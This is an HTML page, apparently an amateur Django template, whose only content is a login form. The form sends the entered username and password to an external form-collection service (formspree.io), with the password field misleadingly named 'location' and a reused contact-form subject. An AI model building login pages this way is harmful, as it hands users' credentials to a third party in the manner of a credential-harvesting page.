<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Badbunch | Home Page</title>
        <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
        <link rel="icon" href="favicon.ico" type="image/x-icon">
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=EB+Garamond&display=swap" rel="stylesheet">
        <link rel="stylesheet" href="libs/font-awesome/css/font-awesome.min.css">
        <link href="css/bootstrap.min.css" rel="stylesheet">
        <link href="C:\Users\Sepehr Moghani\Downloads\tsa_project-main\tsa_project-main\static\css\styles.css" rel="stylesheet">

    </head>

    <header class="left-align-header">
        <div id="mobile-menu-close">
            <span>Close</span> <i class="fa fa-times" aria-hidden="true"></i>
        </div>
        <ul id="menu" class="shadow">
            <li>
                <a href="{% url 'admin:index' %}">Admin</a>
            </li>
        </ul>
    </header>    
    
    <body>
        <div id="contact">
            <br><h3 class="heading-fixed">Login</h3>
            <div id="contact-form">
                <form method="POST" action="https://formspree.io/f/xoqzvqok">
                    <input type="hidden" name="csrfmiddlewaretoken" value="{{ csrf_token }}">
                    <input type="hidden" name="_subject" value="Contact request from transfreight.com.au" />
                    <input type="email" name="_replyto" placeholder="Username" required>
                    <input type="password" name="location" placeholder="Password" required>
                    <button type="submit">Submit</button>
                </form>
            </div>
        </div>
    </body>
</html>
